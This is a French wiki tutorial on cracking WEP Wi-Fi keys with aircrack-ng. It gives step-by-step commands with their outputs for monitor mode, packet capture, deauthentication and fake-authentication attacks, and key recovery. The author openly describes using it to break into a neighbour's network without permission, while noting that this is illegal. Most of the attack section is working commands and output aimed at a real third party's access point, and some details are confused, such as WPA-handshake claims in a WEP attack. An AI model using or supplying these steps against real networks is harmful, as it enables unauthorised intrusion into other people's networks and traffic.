Introduction

Voici un tuto sur un outil très pratique(qui m'a permit d'écrire cet article pendant des vacances a la campagne où mon seul accès a internet était mon voisin) qui va vous permettre de cracker des clés wifi WEP.

Le WEP

Le Wired Equivalent Privacy (abrégé WEP) est un protocole pour sécuriser les réseaux sans fil de type Wi-Fi.

Cependant, plusieurs faiblesses graves ont été identifiées par les cryptologues.Le WEP a donc été supplanté par le WPA en 2003, puis par le WPA2 en 2004 (WPA2 est la version de la norme IEEE 802.11i certifiée par la Wi-Fi Alliance).

Le WEP utilise l'algorithme de chiffrement RC4 pour assurer la confidentialité et la somme de contrôle CRC-32 pour assurer l'intégrité.

Outils

Aircrack-ng est une suite d'outils développés sous licence GPL permettant de surveiller,sniffer et d'attaquer un réseau et de casser des clés WEP et WPA-PSK par bruteforce.
Ceci étant dit, n'oubliez quand même pas que la pénétration dans un réseau sans autorisation est interdit, en gros, ne faites pas comme moi.

Installation

Pour l'installer, rien de plus simple:

aptitude install aicrack-ng

Une fois installé, on va pouvoir passer a l'attaque.

Récupération des données

Pour commencer, on va mettre notre carte wifi en mode Monitor avec l'outil Airmon-ng:

root@oweteam:~$ airmon-ng start wlan0
 
Interface	Chipset		Driver
 
wlan0		Intel 4965/5xxx/6xxx/1xxx	iwlwifi - [phy0]
				(monitor mode enabled on mon0)

-wlan0:notre interface wifi utilisée
Une fois la carte mise en mode Monitor, on va s'en servir pour scanner et voir tout les réseaux a notre disposition:

pnchbllz@Pnchbllz:~$ airodump-ng mon0
 
CH  8 ][ Elapsed: 8 s ][ 2015-02-20 13:43
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:26:44:F4:ED:6D  -69       33       46    0  11  54e  WPA2 CCMP   PSK  YoloSwagReso1
 EA:75:6A:DC:37:54  -77       17        3    0  11  54e  WEP  WEP         YoloSwagReso2 #notre victime
 5C:33:8E:7C:4F:DC  -82       14        5    1   6  54e. WPA2 CCMP   PSK  YoloSwagReso3
 00:19:70:38:72:E9  -87        3        0    0   6  54e. WPA2 CCMP   PSK  YoloSwagReso4

Après avoir scanné et vu tout les réseaux a notre disposition, on voit qu'il y en a un qui est protégé avec une clé WEP, on va donc le choisir et récolter des données(IVS)qui nous permettrons plus tard a casser la clé, plus on a d'IVS, plus on a de chances de casser la clé.
Pour récolter les données, on va utiliser Airodump-ng:

root@oweteam:~$airodump-ng --write toto.cap --channel 11 --bssid EA:75:6A:DC:37:54 mon0
 
CH 11 ][ Elapsed: 3 hours 26 mins ][ 2015-02-20 17:23 ][ fixed channel mon0: -1
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 EA:75:6A:DC:37:54    0 100   110452     20291    1  11  54e  WEP  WEP    SKA  YoloSwagReso2
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 EA:75:6A:DC:37:54  7C:13:54:4C:99:00    0    0 - 1     99   666766

–write: Permet d'écrire dans un fichier .cap
–channel: le canal sur lequel on se met
–bssid: le bssid de la victime
-mon0:interface utilisée

Attaques

Comme vous pouvez le voir, j'ai mis plus de 3 heures pour pouvoir récolter tout les packets dont j'avais besoin pour réussir a casser le mot de passe.
Pour pouvoir accélérer le processus, il existe des attaques avec Aireplay-ng, que nous allons voir.
deauth :dé-authentification de une ou toutes les stations: forçant le client à se ré-authentifier. (-0)

root@oweteam:~$aireplay-ng -0 0 -a EA:75:6A:DC:37:54 -c 7C:13:54:4C:99:00 mon0 
 
17:58:02  Waiting for beacon frame (BSSID: EA:75:6A:DC:37:54) on channel -1
17:58:03  Sending 64 directed DeAuth. STMAC: [7C:13:54:4C:99:00] [ 0| 10 ACKs]
17:58:03  Sending 64 directed DeAuth. STMAC: [7C:13:54:4C:99:00] [ 0| 5 ACKs]
17:58:04  Sending 64 directed DeAuth. STMAC: [7C:13:54:4C:99:00] [ 0| 7 ACKs]
17:58:04  Sending 64 directed DeAuth. STMAC: [7C:13:54:4C:99:00] [ 0| 0 ACKs]
17:58:05  Sending 64 directed DeAuth. STMAC: [7C:13:54:4C:99:00] [ 0| 1 ACKs]
17:58:05  Sending 64 directed DeAuth. STMAC: [7C:13:54:4C:99:00] [ 0| 2 ACKs]
17:58:06  Sending 64 directed DeAuth. STMAC: [7C:13:54:4C:99:00] [ 0| 0 ACKs]

-0 0 :type d'attaque(deauth) et le nombre de fois ou on le fait
-a : bssid
-c : addresse mac de destination
-mon0 : interface utilisée

fakeauth delay : fausse authentification avec le point d'accès (-1)

root@oweteam:~$aireplay-ng -1 0 -a EA:75:6A:DC:37:54 -c 7C:13:54:4C:99:00 mon0 
No source MAC (-h) specified. Using the device MAC (68:17:29:A7:5C:BA)
19:00:22  Waiting for beacon frame (BSSID: EA:75:6A:DC:37:54) on channel -1
 
19:00:24  Sending Authentication Request (Open System) [ACK]
19:00:24  Authentication successful
19:00:24  Sending Association Request [ACK]
 
19:00:29  Sending Authentication Request (Open System) [ACK]
19:00:29  Authentication successful
19:00:29  Sending Association Request [ACK]
19:00:29  Association successful :-) (AID: 1)

-1 0 :type d'attaque(fakeauth) et le delay
-a : bssid
-c : adresse mac de destination
-mon0 : interface utilisée

Il existe pleins d'autres attaques, pour les voir, utilisez la commande suivante:

aireplay-ng --help

Ces attaques ont pour but d’acquérir un WPA Handshake ce qui voudra dire que l'attaque sera réussie.
Notez que le WPA Handshake n'est pas obligatoire pour pouvoir casser le passwd pour une clé WEP mais sera obligatoire pour casser une clé WPA.

Cracker le mot de passe

Une fois les données récupérées, on va utiliser l'outil “Aircrack-ng” qu'on a jusque la pas utilisé, qui va nous permettre de casser notre clé.

root@oweteam:~$ aircrack-ng toto01.cap 
Opening toto01.cap
Read 3001131 packets.
 
   #  BSSID                   ESSID                     Encryption
 
   1  EA:75:6A:DC:37:54       YoloSwagReso2             WEP (20291 IVs)
 
Choosing first network as target.
 
Opening toto.cap-02.cap
Attack will be restarted every 5000 captured ivs.
<code bash>
Starting PTW attack with 20291 ivs.
 
                                                                              Aircrack-ng 1.2 rc1
 
 
                                                              [00:00:02] Tested 2018 keys (got 20291 IVs)
KB    depth   byte(vote)
0    0/  4   D3(29440) 56(26880) 4F(26368) 98(26368) EC(25088) A6(24832) 1F(24576) 64(24576) 1A(24320) 25(24320) 7D(24320) 9B(24320) 03(24064) 
1    0/  3   D1(29696) 84(26624) D5(26112) 33(25856) 69(25856) 83(25856) B7(25856) 5A(25344) C7(25088) 47(24832) 6A(24832) 1E(24576) DF(24576) 
2   33/ 43   7F(22784) 0B(22528) 1C(22528) 24(22528) 35(22528) 44(22528) 4D(22528) 53(22528) 6A(22528) 9B(22528) C1(22528) D6(22528) DF(22528) 
3    0/  4   0B(30208) C2(28160) E7(27392) 68(27392) 12(25344) D0(25344) 0E(25088) DA(25088) EC(25088) FE(25088) 5A(24832) 7B(24832) 9E(24576) 
4    0/  1   24(29440) 20(25344) 2B(25344) 8B(25088) 6E(24832) 8E(24832) C9(24576) D0(24576) 12(24320) 41(24320) EF(24320) F8(24320) 54(24064) 
 
                         KEY FOUND! [ D3:D1:F7:0B:24 ] 
	Decrypted correctly: 100%

Gerix Wifi Cracker

Pour ceux qui ne seraient pas a l'aise avec la ligne de commande,sachez qu'une interface graphique développée en python est là pour vous aider, les sources sont disponibles sur le Github de Gerix.

wiki/aircrack-ng.txt · Dernière modification: 2018/04/23 19:13 (modification externe)
CC0 1.0 Universal
Powered by PHP Driven by DokuWiki Recent changes RSS feed Valid CSS Valid XHTML 1.0 Valid HTML5